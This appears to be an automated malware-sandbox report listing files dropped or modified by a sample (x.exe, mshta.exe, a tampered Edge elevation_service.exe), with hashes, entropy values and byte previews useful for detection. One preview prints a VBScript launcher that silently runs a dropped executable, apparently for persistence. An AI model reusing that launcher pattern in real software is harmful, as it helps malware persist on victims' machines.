                                                                                                                                                Preview:EA06..8..D95..N.8.T(S]..Y.... ...J..j......}Z...L.M.^J_...Esw(uBW#.Qg.Y..o>.V.s.ejwj.....}Z.9.EapXU.w<.Wm..|.....U......r{.aF.Hu...M'.....?N.d...4h...7......WK....K...o..#.9............1.EhSX...Y.}.V..Mm.w..&.K...U..[.[.0..p...xx(`..d.3.*.....8...u....B...5..R.Z.P..).>..H..*..&(.%..Q.....c*..f.Z.......0.O..^.N @....9t.....'..&..._.X... .`...|7j.j.l.I...X.A>.....)..M.<.[..q-..T6....[.....j.........SJ........3.N(T......;....K.x.g.........e...fujFj.B..t..f.......-....er...[..c.8<6W+..W..:...1._4..jkB.Qv....M....c....l.8.....Fx...g.+..|.).&..<$s.Uv...mc5o.....T...*..."SZ..{..}.s......}+. .....{u..%...5;.]w.Z.*A^.W.\}....S.[:...f.U(@...C..S..;u&.........C .N...P.Mo..V.!..F)6=~..n.....O...:.5...Y...U...U.u..7..di8...YZ.p.4..;.Y..#...^..r..j.O...]*3I.>-.....|..S..0}N..:.wf.IM.,.."...Z...R.....YQ..y.k.*.&.q..K.{....hSZ.;a6..aT..n.S..hU......k=...!...=..k#^...k...Z..o.....Yq..?.If..9{.0..A.F...~.M.........u.....v.+UV.Y.J....cD..wj ...'A.u..3.
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):210944
                                                                                                                                                Entropy (8bit):7.804440353519537
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:c5SxhPZBqu018ISR0EwC9VC01Ly00wNC8lsX5hYMrlkpg:2eTs8ISR0E391f0wNCUWprlGg
                                                                                                                                                MD5:62C62E710D458E88E6829E7BC84193DE
                                                                                                                                                SHA1:1C07A2F13C81B820FCA588F41219995279093CA0
                                                                                                                                                SHA-256:B60D259CB7254914EAAEACAD19D89E9CF9C4B31A6783EB36F505D7C64F233EE4
                                                                                                                                                SHA-512:3B2565B8C233AD7DB2E8019FEE3614D2FBB64D44913432F363400EB021BA1263DB2FF6B706BEF033A5681BC031618FD80A7F9F38A29DCDEE55D0DC1DBA49BB58
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:...YUSZ8FPB5..YY.SZ8BPB5.JYYVSZ8BPB5OJYYVSZ8BPB5OJYYVSZ8BPB5.JYYXL.6B.K.n.X..r.P+#bE=%>+7>z[#>,Z;j;<v!/Vb9,....y;<>]l]O?kJYYVSZ8*@..c;.'z".Fn!.K}i&'i".FI..Kd;.'z".F.!.K}i7'J".Fps+K.;.'dp!Fo!.K.#:1z".FBPB5OJYYVSZ8BPB5....VSZ8..B5.K]Y".ZhBPB5OJYY.Sy9IQK5O.XYV.[8BPB5`.YYVCZ8B.C5OJ.YVCZ8BRB5JJYYVSZ8GPB5OJYYV.Y8BTB5.q[YTSZ.BPR5OZYYVSJ8B@B5OJYYFSZ8BPB5OJYY.FX8.PB5O*[Y6E[8BPB5OJYYVSZ8BPB5OJYYVSZ8..C5SJYYVSZ8BPB5OJYYVSZ8BPB5OJYY.^X8.PB5OJYYVSZ8B.C5.KYYVSZ8BPB5OJYYVSZ8BPB5OJYYx'?@6PB5W.XYVCZ8B.C5ONYYVSZ8BPB5OJYYvSZXl"&T;+YY.>Z8B.C5O$YYV.[8BPB5OJYYVSZ8.PBua.8-7SZ8.`B5Oj[YVEZ8BZ@5OJYYVSZ8BPB5.JY.x!)J!PB5/\XYV3X8BHC5Oj[YVSZ8BPB5OJYY.SZxBPB5OJYYVSZ8BPB5OJYYVSZ8BPB5OJYYVSZ8BPB5OJYYVSZ8BPB5OJYYVSZ8BPB5OJYYVSZ8BPB5OJYYVSZ8BPB5OJYYVSZ8BPB5OJYYVSZ8BPB5OJYYVSZ8BPB5OJYYVSZ8BPB5OJYYVSZ8BPB5OJYYVSZ8BPB5OJYYVSZ8BPB5OJYYVSZ8BPB5OJYYVSZ8BPB5OJYYVSZ8BPB5OJYYVSZ8BPB5OJYYVSZ8BPB5OJYYVSZ8BPB5OJYYVSZ8BPB5OJYYVSZ8BPB5OJYYVSZ8BPB5OJYYVSZ8BPB5OJYYVSZ8BPB5OJYYVSZ8BPB5OJYYVSZ8BPB5OJYYVSZ8BPB5OJYYVSZ8BPB5OJYYVSZ8BPB5OJYY
                                                                                                                                                Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1696256
                                                                                                                                                Entropy (8bit):7.476661384902613
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:du6J3NO0c+JY5UZ+XC0kGso6Fal1PcweksaTzWYtsqjnhMgeiCl7G0nehbGZpbD:vU0c++OCvkGs9Falrx2YRDmg27RnWGj
                                                                                                                                                MD5:60633CA891471EE569DFF187A7C5FF59
                                                                                                                                                SHA1:93F41C6378A5FA7954A9312C085923202452D5FD
                                                                                                                                                SHA-256:D9487FBFB0064873D0F48625AE5ECBFBEACCF17AC809DE32A1B7A0FB872079F0
                                                                                                                                                SHA-512:CA88C862DAA03981BBA44EA4C92F44663DC1005165AC08B21878DBF550A1B29823CBD148D522F6A5996ACF08AA8460A2B6C1E82EA82B57B910B6E8A20FE6C0A2
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}.r}.r}.4,".p}.....s}../..A}../#..}../".G}.{.@.{}.{.P.W}.r}.R....)."}.....s}../..s}.r}T.s}.....s}.Richr}.................PE..L...j.Lg.........."..........".......}............@..........................P......X.........@.......@.....................L...|....p..Pz...........................+..............................pH..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...Pz...p...|..................@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1696256
                                                                                                                                                Entropy (8bit):7.476661384902613
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:du6J3NO0c+JY5UZ+XC0kGso6Fal1PcweksaTzWYtsqjnhMgeiCl7G0nehbGZpbD:vU0c++OCvkGs9Falrx2YRDmg27RnWGj
                                                                                                                                                MD5:60633CA891471EE569DFF187A7C5FF59
                                                                                                                                                SHA1:93F41C6378A5FA7954A9312C085923202452D5FD
                                                                                                                                                SHA-256:D9487FBFB0064873D0F48625AE5ECBFBEACCF17AC809DE32A1B7A0FB872079F0
                                                                                                                                                SHA-512:CA88C862DAA03981BBA44EA4C92F44663DC1005165AC08B21878DBF550A1B29823CBD148D522F6A5996ACF08AA8460A2B6C1E82EA82B57B910B6E8A20FE6C0A2
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}.r}.r}.4,".p}.....s}../..A}../#..}../".G}.{.@.{}.{.P.W}.r}.R....)."}.....s}../..s}.r}T.s}.....s}.Richr}.................PE..L...j.Lg.........."..........".......}............@..........................P......X.........@.......@.....................L...|....p..Pz...........................+..............................pH..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...Pz...p...|..................@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):12320
                                                                                                                                                Entropy (8bit):7.982554097909734
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:5hcaSn0ZS8AtD7BjBaBAh0xuzojNAaZYCBdhkIHQO//:5hnSn0lAthRzopXLLHF//
                                                                                                                                                MD5:43E70AC7DAC1FBF869BD2A8541AAC665
                                                                                                                                                SHA1:982564D8B294AB223CF3945D2818DF15462FF5C6
                                                                                                                                                SHA-256:63A634144023DDC69C018565C667B34D439BF54711D846B29B8BA8D24594BAFB
                                                                                                                                                SHA-512:031E6BA84EBB7B6533FD57EECC28597F2C02CA5B8975096C0BDA3264E209ADE01C68BF3439EE0A1E50180DDF8AE8159A9F10F4B7DCE8B01C32AE5131977049F3
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:$...>. .uT.uL<.3.....<..r..k..UqV.<.$."n..../..@.%..Dq.Uv6..|l...q...0...E...1....l.l<w.P.......G...$...U.].h.`%WXR..4...H(........).....l.~6...>3.a!.PSL_m.u..<i.~.g..7.....4...........`k..Ay.%Eg...]....2.&tS.......b3.[..&....Z.I._W'...T.....wE.z..M.8k!...$E..}...}...7C.....{k...I..]...V..... ......OD...a".U,%....@b.0..>.raw.q..t.."U*4.FK. .g....D...`..P*....-".(N?F..$.p...`....5I..iP..{.L..H.pK[.e......&.T.[..8b../..y..w*.z..e....{....{1z...Q.R..).ft.....+.<..2S.g..,6...<..=W).....Qj......$L...(P.'.o/bU..>..$..$...../H...'.+.I..........1Ci:.#....8>....`......".o.v..]..v.7.8t....g.]#YN...+.&F....S :.U.F.Z....Rl.4....7........k.B....*V.$..3Hm...Nh..2E."aa...KeT.....y..;#..2.5(.........0........j.K.d.....5..h.04...~....}k.{..D7....KI..,+.............f..l*.T../........L.C..>.`'.k..#...5v.......r..B$q..!,..b-...,yCR_...s|.....x2.....E.4..7/w.b...\U..?..:J|...;...j.....d.....9..>(.G9.%d...D.....L...0.7....$.Mr3.':*k.E..m.r...m.$.~R\.
                                                                                                                                                Process:C:\Users\user\AppData\Local\subpredicate\differences.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):288
                                                                                                                                                Entropy (8bit):3.4118971589590945
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:DMM8lfm3OOQdUfcloRKUEZ+lX1WlQPKlTGF50qGZlm6nriIM8lfQVn:DsO+vNloRKQ1ziGF5Ebm4mA2n
                                                                                                                                                MD5:4A8D35BBA7DA5134B9DCA0E880E2A49C
                                                                                                                                                SHA1:A2DDFF2E8C1F9FE36A69F478892010268259256F
                                                                                                                                                SHA-256:3D3F57E13EBAAF87A64DD031C5CB19406C2EC15DB1681EB90F92DD6A23092C07
                                                                                                                                                SHA-512:DD4C6CD805D004D74E7CBD002F0DCFDC8114105BA43C8371C950F3E706ED320557D63F8339212D09FF658A32CEF1700C938066709FEA4F0494877B46C581A454
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.s.u.b.p.r.e.d.i.c.a.t.e.\.d.i.f.f.e.r.e.n.c.e.s...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...
                                                                                                                                                Process:C:\Windows\System32\msdtc.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:modified
                                                                                                                                                Size (bytes):2313
                                                                                                                                                Entropy (8bit):5.1333300352699744
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:32qhuhCehuhqfhuhofhuhE2qhuh6987FMx7F/rt57wt+07FKC7867qrT7FoC786k:Z070s0Y0q0mF7Dm5z
                                                                                                                                                MD5:2B9E547A157A374A3CEA4001B060F23D
                                                                                                                                                SHA1:C9B3DE33329C0F92F118B9D3AB107470986BE557
                                                                                                                                                SHA-256:4BF9FFC798C6F60E26C162C52952F2644DD32BAE27497B3197DAEB809E55DBB1
                                                                                                                                                SHA-512:BFF4DBE10E47485FC6BB7D7DF12C1E76868C0E01FEA691A4EF6D077188C14662F5BA9DD46BA317B0FB5AD4A477213C658826FB0CCEFEE04CA11F3F7A07AE5BA5
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:12-07-2019 09:17 : DTC Install error = 0, Enter MsDtcAdvancedInstaller::Configure, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (367)..12-07-2019 09:17 : DTC Install error = 0, Action: None, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (396)..12-07-2019 09:17 : DTC Install error = 0, Entering CreateXATmSecurityKeyCNG, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (1700)..12-07-2019 09:17 : DTC Install error = 0, Exiting CreateXATmSecurityKeyCNG, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (1876)..12-07-2019 09:17 : DTC Install error = 0, Exit MsDtcAdvancedInstaller::Configure, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (454)..10-03-2023 08:56 : DTC Install error = 0, SysPrepDtcSpecialize : Enter, com\complus\dtc\dtc\adme\deployment.cpp (2099) ..10-03-2023 08:56 : DTC Install error = 0, SysPrepDtcGeneralize : Enter, com\complus\dtc\dtc\adme\deploy
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
                                                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1150976
                                                                                                                                                Entropy (8bit):5.038905144050007
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:uOXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:uOsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:44C283F4BD1BAB81C2FA725DEF4F6B81
                                                                                                                                                SHA1:5CF8BC0B72FF64DA224E13FB3ECBE84A17287908
                                                                                                                                                SHA-256:F2F321BE61F94E25B5109545BC6209F393D326ECC2904D911D06D0EA728FA8F5
                                                                                                                                                SHA-512:240B048527BFF04BC2B1918098F04D4684A0F1079EA689366ECC58A21D805867FC3E1946D55A986210A867E11EDA45E4C0512116A451C1D0AE1D23AD47E0CEC2
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........+-.~E~.~E~.~E~...~.~E~..F..~E~..A..~E~.~D~.~E~..D..~E~..@..~E~..L..~E~...~.~E~..G..~E~Rich.~E~................PE..L...CY]..................&...,...............@....@.................................._........... ..........................lQ..@....`..................................T............................................P..h............................text....%.......&.................. ..`.data........@.......*..............@....idata.......P.......,..............@..@.rsrc........`.......8..............@..@.reloc...P.......@...P..............@...........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                Category:modified
                                                                                                                                                Size (bytes):1930240
                                                                                                                                                Entropy (8bit):7.5357528601040205
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:49152:gQW9BKNX0IPgiVMBOuyDmg27RnWGj1Dmg27RnWGj:g0EI4MD527BWGBD527BWG
                                                                                                                                                MD5:D57EFB62378CB9FE5ABA5C4735D90C00
                                                                                                                                                SHA1:AC500CCEC6614E3476E9A206617F0CA52D67264E
                                                                                                                                                SHA-256:1483EFEFCCFC89BF59C92DA27ED053D1978F3AB1D4F93183608B0E10BCA83A54
                                                                                                                                                SHA-512:DAF58FF98E257B87D40379AAE4951A95D29737C559EE8442899A1B703016E670DF6616BD6DA4485ED2D7E7C0F4052718AC5CFD14796D337DBC9F9FFC20EFFAAD
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g..=#p.n#p.n#p.n*.kn%p.n7..o(p.n7..o p.n7..o.p.n#p.n.u.n7..o.p.n7..o.p.n7..n"p.n7..n"p.n7..o"p.nRich#p.n........................PE..d....4............"..........$.......K.........@...................................._..... .......... .......................................j..h....`...a... ...:..................0a..T....................%..(....$...............%..P............................text...L........................... ..`.rdata..............................@..@.data....z.......n..................@....pdata...:... ...<..................@..@.rsrc....a...`...b...2..............@..@.reloc..............................@...................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1224192
                                                                                                                                                Entropy (8bit):5.163549081133242
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:z2G7AbHjkxsqjnhMgeiCl7G0nehbGZpbD:z2G7AbHjcDmg27RnWGj
                                                                                                                                                MD5:2E43BEE7F1270130B73391F853D6CB9C
                                                                                                                                                SHA1:DE6E331E48577BE6D9ECBB2F3C5BD59C944E5CF8
                                                                                                                                                SHA-256:35164F41EFFA2AC98EE92D984442725D8277C2973A0A9164679F18D5B5587DD0
                                                                                                                                                SHA-512:3599D7588BCB4E9A203FB6F7D29D6374652DE052B69EAE2D35333D81C65F60A051F67CEEFCA4145F7CE5252924CE4A18343766BA9F84666F8DD528213F01E475
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B6l0.W.c.W.c.W.c./.cPW.c.<.b.W.c.<.b.W.c.W.c.S.c.<.b.W.c.<.b.W.c.<.b.W.c.<.c.W.c.<.c.W.c.<.b.W.cRich.W.c................PE..d...^.Jw.........."............................@.......................................... .......... ......................................p?...................................... #..T...................8...(... ...............`...H............................text............................... ..`.rdata...b.......d..................@..@.data...@....p.......P..............@....pdata...............T..............@..@.rsrc................b..............@..@.reloc...P.......@...n..............@...........................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1242624
                                                                                                                                                Entropy (8bit):7.288941667956981
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:4kdpSI+K3S/GWei+qNv2uG3psqjnhMgeiCl7G0nehbGZpbD:46SIGGWei2uG3tDmg27RnWGj
                                                                                                                                                MD5:B7AC35C8D5EC032758BDF18DAF940E76
                                                                                                                                                SHA1:0DCC0A15777969306B5488E6B47E7B78B5671025
                                                                                                                                                SHA-256:74A8579D03832BD09BD7C95B263B7CFD958A099161312FFD89E981C63C00A31C
                                                                                                                                                SHA-512:19F15649266DDE3118B00B8549EC5CE9A5C22BC505E3028630F51AFC29D1F0FB3E0B2B76D622AAF85491DC391A2CFA8A98A05D74FD576CB547219325237CADE0
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............}x..}x..}x...{..}x...|..}x...y..}x..}y.x|x...p..}x...}..}x......}x...z..}x.Rich.}x.................PE..d................."...... .....................@.............................P........... ..................................................{..h....P...........1......................T...........................pk...............l.......{..@....................text...Y........ .................. ..`.rdata..2u...0...v...$..............@..@.data... H.......<..................@....pdata...1.......2..................@..@.didat.......@......................@....rsrc........P......................@..@.reloc.......`......................@...................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1141248
                                                                                                                                                Entropy (8bit):5.017509010481009
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:66Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:66sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:DCAC6C83695DE7AFC6FBC22B2463934D
                                                                                                                                                SHA1:23C193590CC3506BACF5A5652007D63D33C959C0
                                                                                                                                                SHA-256:92B6E80773DEE59276C778F4A2BB3E81AE72AFB267A3FDECA3051BE5C44C2884
                                                                                                                                                SHA-512:0DF8121CD578962226551F1D0B39AF391C32DFAB3E1B06A58EB22B2E680917C386AB2B185DFB51D664920682192C0765C923770BF552B594CE14586B3C3F5C78
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........C."^".q^".q^".qWZ;qL".qJI.p_".qJI.p\".qJI.pO".q^".qy".qJI.p[".qJI.p]".qJIWq_".qJI.p_".qRich^".q........................PE..d...k(............".........."...... ..........@.......................................... .......... .......................................&.......P.......@......................0#..T............................ ..............(!..p............................text............................... ..`.rdata....... ......................@..@.data........0......................@....pdata.......@....... ..............@..@.rsrc........P......."..............@..@.reloc...P...`...@...*..............@...........................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\msdtc.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):16384
                                                                                                                                                Entropy (8bit):0.3213963681452244
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:gTvaq28ta/k/uMclF6vMclFq5zwnGsz8gYbOCzE5Zm3n+SkSJkJIOcuCjHu9+GUV:2V280kqF69Fq5zxx6CzE5Z2+fqjFyA
                                                                                                                                                MD5:CAB3B9217EF400B9A7B2AE8C928F7FF4
                                                                                                                                                SHA1:A74AEE2841EA5EEC1E443A9620E02D52270446B4
                                                                                                                                                SHA-256:0DB4D05DC085CC46E916820E4EBDA80FD1C94F634163791B224E5672432E0DE3
                                                                                                                                                SHA-512:3DE9F05E3254247AC2EC0703B32E66CDE406B131BDFA1D7A194881D742911143F064DBB1820B5F63ACADBA23582B354341444CA2D2886B1B3B0001D329B5E0FE
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:.@..X...X.......................................X...!...........................p...@...r] ..............@......eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1..............................................................O.............M...D..........M.S.D.T.C._.T.R.A.C.E._.S.E.S.S.I.O.N...C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.M.S.D.t.c.\.t.r.a.c.e.\.d.t.c.t.r.a.c.e...l.o.g.............P.P.p...@...r] .............................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1235968
                                                                                                                                                Entropy (8bit):5.182185209520669
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:7pFtQO9Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:mO9sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:4E2ACC748CE94AC4AC70C66C0815F52C
                                                                                                                                                SHA1:AB5A45937861839B2236491A856C92F06994203F
                                                                                                                                                SHA-256:E33CCA3D95D226FEA17A517C6E505D76B53C8F7E39E537372DD35249367BE5E3
                                                                                                                                                SHA-512:135BD1126F7179214DC0564586E1301FED7100EC662BBEBC3D59A487D5EA7B2CB11E4FABF2A88A342E22726BC280C4A0738765FB68B63154C37DDC024148F31E
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@A...A...A...H.......U...K...U...B...A.....U...F...U...N...U...e...U.t.@...U.v.@...U...@...RichA...................PE..d...6............".................0..........@....................................H..... .......... ......................................Xq..........x............................S..T...................(*..(....)..............P*...............................text...@........................... ..`.rdata...n... ...p..................@..@.data...............................@....pdata..............................@..@.rsrc...x...........................@..@.reloc...P.......@..................@...........................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1846784
                                                                                                                                                Entropy (8bit):6.939434724876197
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:qW6BApg2YuyuNDYTabvcRvNYf8km1wsqjnhMgeiCl7G0nehbGZpbD:qF2YuHNETovcvNYf8kmSDmg27RnWGj
                                                                                                                                                MD5:723558C0A185F957C2EBE638F8BBB34E
                                                                                                                                                SHA1:47F9838098BBDA1B627B1824BEF01803F6069503
                                                                                                                                                SHA-256:72181905EC0A9CD480674B7B9517BB6144FB37C9D16649A22DF9108DDFDF3E2D
                                                                                                                                                SHA-512:8296379A6A75603F2E2099A6A99266A5269209AE26E9F7CC78BCCD140566AC5A8E22E935AE8E1B0F4D97E908EC66CEC4A690CF8DACADDB1C1FA391080E4A3725
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......W`............yA.K...j...........j.....j.....j.....j.0...j-.....j....Rich...........................PE..d................."......"...(......@..........@.............................p............ .......... .......................................~..H....`..`........................... t..T...........................0w..............Hx..p............................text....!.......".................. ..`.rdata..P^...@...`...&..............@..@.data...............................@....pdata..............................@..@.rsrc...`....`.......6..............@..@.reloc.......p.......>..............@...........................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                Category:modified
                                                                                                                                                Size (bytes):1455616
                                                                                                                                                Entropy (8bit):7.238879043874979
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:/iW6ZvAKF5i/dN9Bdexj9Trk+F9sqjnhMgeiCl7G0nehbGZpbD:/YxF50b9Bdm9TxnDmg27RnWGj
                                                                                                                                                MD5:FA93A4B8D19BEF4A259ABCD64DCFEFC3
                                                                                                                                                SHA1:11CFA9B698AC3D59B0DAD798B9758692BA5C04DA
                                                                                                                                                SHA-256:B92889091650EFCF8B21B028FE97DAF54BB55998E131FC1F708F3C3445B35A5C
                                                                                                                                                SHA-512:0CDBA4B03799C05B7967A9C405656110EC38D3985815EBB476BD9DCBB6B421F45B0E406EB05B399D195290BC56F0BC05A7C8630539E9AC69B1220AD838CD37F0
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......zq..>...>...>...7h..D...*{..4...*{..=...>...+...*{..9...*{..V...*{......*{n.?...*{l.?...*{..?...Rich>...........PE..d...)ew..........."................. ~.........@....................................F..... .......... .................................................. .......@k...................l..T...................@...(...p...............h................................text............................... ..`.rdata.............................@..@.data....8.......*..................@....pdata..@k.......l..................@..@.didat..8....p.......>..............@....rsrc... ............@..............@..@.reloc...............F..............@...........................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1225728
                                                                                                                                                Entropy (8bit):5.1633219985364525
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:ZEP3R6AXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:q6AsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:70BB2AC3B1D5DF22D2B74DA852AD13AA
                                                                                                                                                SHA1:959E817B16BF61A0B1CD33CDABD1D2EDE6D4229B
                                                                                                                                                SHA-256:EF66D247A07B5701A9D0794B9090913EB2D1F5B2BB7C589451922F9918C7B8F0
                                                                                                                                                SHA-512:3DFC6D77C2C5AC035A2D23B24CA0529F3B2152B5536855DFFB0002C90B1406F82749D5C957388D8B7E46928242639078F55930C18F7952C79DCC259378D5A5E8
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,..dB.dB.dB....dB..A.dB..F.dB.dC.,dB..C.dB..G.dB..J.dB....dB..@.dB.Rich.dB.........PE..d...E.~..........."............................@.......................................... .......... ......................................`E...............p.. ................... ...T...............................................8...TA.......................text............................... ..`.rdata..rV.......X..................@..@.data........`.......@..............@....pdata.. ....p.......D..............@..@.didat...............R..............@....rsrc............ ...T..............@..@.reloc...P.......@...t..............@...................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):12320
                                                                                                                                                Entropy (8bit):7.984543359295405
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:ZTE6SUS7yFNS3wUrSN9e6eQ4wIfjnt+t+Z3CDgCUPkbLmYdbKaOpUZ/4jKUo88rL:ZRS0N6wISneDQURR3bKbLmYdG9Jo883
                                                                                                                                                MD5:AA3595F18032D14BE0AD5AA06873DC7E
                                                                                                                                                SHA1:D41184C82ADA247417D617B8F49A341D2130041A
